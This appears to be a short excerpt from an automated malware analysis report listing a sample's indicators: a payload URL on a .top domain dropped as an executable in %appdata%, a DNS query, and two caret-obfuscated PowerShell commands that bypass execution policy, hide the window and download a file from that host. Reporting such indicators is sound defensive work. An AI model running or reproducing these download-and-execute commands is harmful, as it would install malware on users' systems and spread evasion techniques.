Technical Information
- http://www.zoerpoled.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^Ers^H^El^l.EXe -^Ex^ECuTIo^n^poLIC^y ^ByPASs -^N^OProFIL^E -WiN^Dowsty^L^e ^H^i^D^d^e^n (^NE^w-Ob^J^Ec^t^ SyStE^M.NeT.^w^EBC^LiE^N^T)^.^dOW^NlOadFile(^'http://www.zoerpoled.top...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "pOW^Ers^H^El^l.EXe -^Ex^ECuTIo^n^poLIC^y ^ByPASs -^N^OProFIL^E -WiN^Dowsty^L^e ^H^i^D^d^e^n (^NE^w-Ob^J^Ec^t^ SyStE^M.NeT.^w^EBC^LiE^N^T)^.^dOW^NlOadFile(^'http://www.zoerpoled.top...' (with hidden window)